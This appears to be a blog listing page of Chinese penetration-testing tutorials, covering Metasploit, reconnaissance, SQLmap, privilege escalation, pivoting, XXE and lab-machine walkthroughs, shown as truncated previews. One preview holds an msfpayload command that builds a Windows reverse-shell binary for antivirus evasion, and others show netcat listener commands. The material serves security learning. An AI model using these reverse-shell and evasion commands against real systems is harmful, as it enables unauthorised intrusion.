渗透测试
不断积淀
持之以恒
展开
-
Metasploit学习之免杀技术
文章目录面杀技术使用msf攻击载荷生成器创建可独立运行的二进制文件躲避杀毒软件的检测面杀技术使用msf攻击载荷生成器创建可独立运行的二进制文件msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /va...原创 2020-01-12 10:24:58 · 468 阅读 · 0 评论 -
Metasploit学习之渗透攻击之旅
文章目录渗透攻击之旅渗透攻击基础渗透流程全端口攻击载荷:暴力猜解目标开放的端口渗透攻击之旅渗透攻击基础Metasploit框架中包含数百个模块,在MSF终端中运行show命令可以把所有模块显示出来。命令:show exploits 显示所有可用的渗透攻击模块show auxiliary 显示所有的辅助模块以及它们的用途show options 显示各个模块正确运行所需的各种设置。...原创 2020-01-08 17:09:21 · 222 阅读 · 0 评论 -
Metasploit学习之漏洞扫描
文章目录漏洞扫描专用漏洞扫描器漏洞扫描漏洞扫描器是一种能够自动在计算机、信息系统、网络以及应用软件中寻找和发现安全弱点的程序。它通过网络对目标系统进行探测,向目标系统发送数据,并将反馈数据与自带的漏洞特征库进行匹配,进而列举出目标系统上存在的安全漏洞。由于各种操作系统网络模块的实现原理不同,所以对于接收到的探测数据会有不同的响应,漏洞扫描器可以根据不同的响应判断系统版本。使用漏洞扫描器通...原创 2020-01-07 09:01:35 · 659 阅读 · 0 评论 -
Metasploit学习之情报搜集
文章目录Metasploit学习之情报搜集被动信息搜集whois查询Netcraftnslookup主动信息搜集使用Nmap进行端口扫描在Metasploit中使用数据库高级Nmap扫描技巧:TCP空闲扫描在MSF终端中运行Nmap使用Metasploit进行端口扫描针对性扫描服务器消息块协议扫描搜寻配置不当的Microsoft SQL ServerSSH服务器扫描FTP扫描简单网管协议扫描编写自...原创 2020-01-05 21:04:22 · 279 阅读 · 0 评论 -
Metasploit学习之Metasploit基础
文章目录专业术语渗透攻击(Exploit)攻击载荷(Payload)Shellcode模块(Module)监听器(Listener)Metasploit用户接口MSF终端MSF命令行ArmitageMetasploit功能程序MSF攻击载荷生成器MSF编码器Metasploit Express和Metasploit Pro专业术语渗透攻击(Exploit)渗透攻击是指由攻击者或渗透测试者利...原创 2020-01-01 21:20:27 · 436 阅读 · 0 评论 -
Metasploit学习之渗透测试基础
文章目录渗透测试基础PTES标准中的渗透测试阶段渗透测试类型漏洞扫描器渗透测试基础PTES标准中的渗透测试阶段前期交互阶段与客户组织进行讨论,确定渗透测试的范围和目标。这个阶段最为关键的是需要让客户了解渗透测试将涉及哪些目标。而这个阶段也为你提供了机会,来说服客户走出全范围渗透测试的理想化愿景,选择更加现实可行的渗透测试目标来进行实际实施。情报搜集阶段采取各种可能的方法来搜集将要攻击...原创 2019-12-31 23:58:19 · 320 阅读 · 0 评论 -
(4)Kali渗透测试之被动信息搜集
当接到任务时,首先就要进行渗透阶段的被动信息搜集。被动信息搜集公开渠道可获得的信息与目标系统不产生直接交互尽量避免留下一切痕迹OSINT:信息搜集内容IP地址段域名信息邮件地址文档图片数据公司地址公司组织架构联系电话/传真号码人员姓名/职务目标系统使用的技术架构公开的商业信息信息用途用信息描述目标发现社会工程学攻击物理缺口信息搜集-DNS...原创 2019-06-17 16:20:45 · 346 阅读 · 0 评论 -
Kali渗透测试之实验环境搭建
自己搭建实验环境既安全又利于学习虚拟机平台模拟真实网络防火墙M0n0wall防火墙学会设置M0n0wall防火墙常用防火墙背靠背防火墙Pfsense 有waf和防病毒,安全措施比较多...原创 2019-06-04 20:27:02 · 1788 阅读 · 0 评论 -
(3)Kali渗透测试之基本工具-nc、wireshark、tcpdump、过程文档记录工具
基本工具的介绍netcat -nc网络工具中的瑞士军刀侦听模式/传输模式传输文本nc -vn ip port 客户端连接一个服务器nc -l -p port 服务端监听本地端口传输文件、目录nc -lp 33 3 > 1.mp4nc -nv 1.1.1.1 333 < 1.mp4 -q 1或者nc -q 1 -lp 333 < a.m...原创 2019-06-14 20:23:49 · 485 阅读 · 0 评论 -
(5)Kali渗透测试之主动信息搜集
文章目录主动信息搜集发现二层扫描三层发现四层发现端口扫描主动信息搜集被动信息搜集可能包含过时的信息直接与目标系统交互通信无法避免留下访问的痕迹使用受控的第三方电脑进行探测使用代理或已经控制的主机做好被封杀的准备使用噪声迷惑目标,淹没真实的探测流量扫描发送不同的探测,根据返回结果判断目标状态发现识别活着的主机潜在的被攻击目标输出一个IP地址列表...原创 2019-06-19 16:45:53 · 301 阅读 · 0 评论 -
渗透测试之三内网跳板
搭建内网的转发跳板当成功控制一个网络中的一台主机后,由于后面的主机都在内网中无法访问,所以需要在跳板机上搭建代理,实现对内网中的其他主机的访问portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4–IPV6的转换转发。并且内置于meterpreter。攻击机: 192.168.1.5 Debian靶机: 192.168.1.4 Windows 7192.168.1...原创 2019-05-23 20:57:31 · 4399 阅读 · 0 评论 -
渗透测试之二 工具介绍SQLmap
SQLmap介绍是渗透测试中常用的攻击工具,用来对数据库进行SQL注入等SQLmap参数详解Usage: python sqlmap.py [options]Options(选项):-h, --help Show basic help message and exit 展示帮助文档 参数-hh Show advanced help message and exit 展示详细帮助文...原创 2019-05-23 14:57:52 · 248 阅读 · 0 评论 -
渗透测试系列之一 提权
提权:通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。Windows:User >> SystemLinux:User >> Root提权有很多方法,主要依赖exp,提权方法如下:操作系统本身的提权利用数据库进行提权系统配置不当提权第三方软件提权提权的第一步同样是信息收集对于系统的基本信息一般包括主机名所属域环...原创 2019-05-23 10:52:51 · 605 阅读 · 0 评论 -
XXE详解-----XML实体注入
XXE-----XML外部实体注入XML简介XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素XML文档的构建模块所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素属性实体PCDATACDATA...原创 2019-04-29 21:13:39 · 1750 阅读 · 0 评论 -
渗透测试靶场练习(二)之g0rmint
渗透测试之g0rmint信息搜集arp-scan扫描查找到IP为192.168.24.131的主机为靶机主机探测发现有22端口和web的80端口,扫描网站目录获得robots.txt打开robots.txt发现/g0rmint/路径,打开是一个登陆界面,在源码中发现备份文件打开发现文件不存在,应该是在这个目录下,使用dirb扫描发现info.php,打开提示有backup....原创 2019-04-09 22:21:38 · 884 阅读 · 0 评论 -
渗透测试靶机练习(一)之lazysysadmin
lzaysysadmin情报搜集主机发现,使用netdiscover主机扫描,使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果,有workpress和phpmyadmin登录网站,查看robots.txt文件存在目录遍历漏洞,但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机...原创 2019-04-08 19:50:32 · 1339 阅读 · 0 评论 -
渗透测试靶场练习(三)之DC-1
DC-1环境搭建就不细述了,直接下载VM文件打开即可,注意设置好网络下载链接下载主机发现使用arp-scan -l在局域网中查找存活主机可以知道IP为192.168.24.133的主机为靶机端口扫描扫描结果显示打开了四个端口,首先看看80端口是一个网站的登录界面,查看源码没有发现有用的信息尝试目录扫描,扫描了很久也没什么收获,使用wappalyzer插件识别出这是dr...原创 2019-04-10 14:32:08 · 3154 阅读 · 3 评论